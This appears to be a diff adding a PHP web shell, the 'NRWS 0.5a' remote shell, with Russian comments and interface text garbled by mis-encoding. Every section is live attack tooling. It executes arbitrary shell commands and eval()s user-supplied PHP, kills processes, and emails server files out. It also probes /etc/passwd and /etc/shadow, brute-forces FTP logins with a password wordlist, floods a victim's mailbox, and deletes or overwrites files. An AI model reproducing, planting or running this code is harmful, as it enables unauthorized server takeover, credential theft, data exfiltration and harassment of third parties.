+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó </b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ðàáî÷àÿ äèðåêòîðèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåðèòå àëèàñ <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+/// Îòïðàâêà ôàéëîâ íà ìûëî
+case "download_mail":
+$buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NIX REMOTE WEB SHELL   ($file)";
+
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2)
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïðàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+break;
+// ñïèñîê ïðîöåñîâ
+case "ps":
+echo "<b>Ïðîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïðîöåñ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåñå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåñîâ ! Âèäíî çëîé àäìèí çàïðåòèë ps ";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå ïõï êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïðàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïðàâëåíî !</h2>";
+}
+break;
+
+
+// Èíôîðìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëþ÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëþ÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîðìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåðâåðà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåðâåð: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+echo "<b>Ïðèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>Ñâîáîäíî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version : </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïðîöåñà : </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd ! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow !</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow- !</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd ! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêðûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêðûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ðåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêðèïòå
+case "about":
+
+echo "<center><b>Ïðèâåò âñåì</b></center>Ïåðåä âàìè ïåðâàÿ âåðñèÿ ìîåãî ñêðèïòà óäàëåííîãî àäìèíèñòðèðîâàíèÿ.<b>(0.5a)</b> <br>Ñêðèïò íàõîäèòñÿ â ñòàäèè òåñòèðîâàíèÿ, òàê, ÷òî åñëè íàéäåòå êàêèå-òî áàãè, îáðàùàéòåñü ñþäà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èëè <a href=mailto:dreamerz@mail.ru>íà ìûëî dreamerz@mail.ru</a>, èëè íà <a href=http://dreamerz.cc>dreamerz.cc</a>, èëè íà ICQ: <b>817312</b><br>Êòî õî÷åò ïîó÷àñòâîâàòü â ðàçðàáîòêå ñêðèïòà - ïèøèòå, ïîêàçóéòå ÷òî âû ìîæåòå äîáàâèòü è èñïðàâèòü...<br>Íó, è ñïàñèáî ýòèì ëþäÿì: Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... è ìíîãèì äðóãèì ...";
+echo "<br> È èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå. ";
+
+echo "<br><br><br>Íîâàÿ âåðñèÿ ëåæèò çäåñü: <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a>
+<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>";
+break;
+// ÔÒÏ ïîäáîð ïàðîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëþ÷åíèå  login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïðîâåðèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàðîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàðîëü äëÿ ïðîâåðêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõðàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàðîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåðíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêðûò 21 ïîðò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåðòâû
+$from=$_POST['from']; // Ìûëî æåðòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïðåäåëÿåò äëèííó òåêñòà + 1 (ïðîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåðòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåðòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ìûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àðõèâàöèÿ äèðåêòîðèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ðàíäîìíûå íàçâàíèÿ ôàéëîâ àðõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àðõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = "  [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ðåäàêòèðîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãðóçèòü</a>]  [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>Èíôîðìàöèÿ</a>]<br>";
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+echo "<br><td><b>id:</b> ".@exec('id')."</td></tr";
+
+
+if(@$_GET['deldir']=="1"){
+
+@$dir=$_GET['d'];
+function deldir($d)
+{
+$handle = @opendir($d);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$d/$ff")){
+deldir("$d/$ff");
+}else{
+@unlink("$d/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($d)){
+@$success = true;}
+return @$success;
+}
+$dir=@$d;
+deldir($d);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<br><b>Êàòàëîã óäàëåí !</b>";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñðåäñòâî çàìåíû:<br>
+(Òû ìîæåø çàìåíÿòü ëþáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP.<br>
+2. microsoft.com IP :)<br>
+Çàìåíÿòü ýòî <input name=this size=30 value=$ip> ýòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòðåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Óäàëèë $d/$e íå ïàðñÿ ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåðæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: Òû óâåðåí ?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ðåäàêòèðîâàíèå:<br>
+$de<br>
+<form method=post>
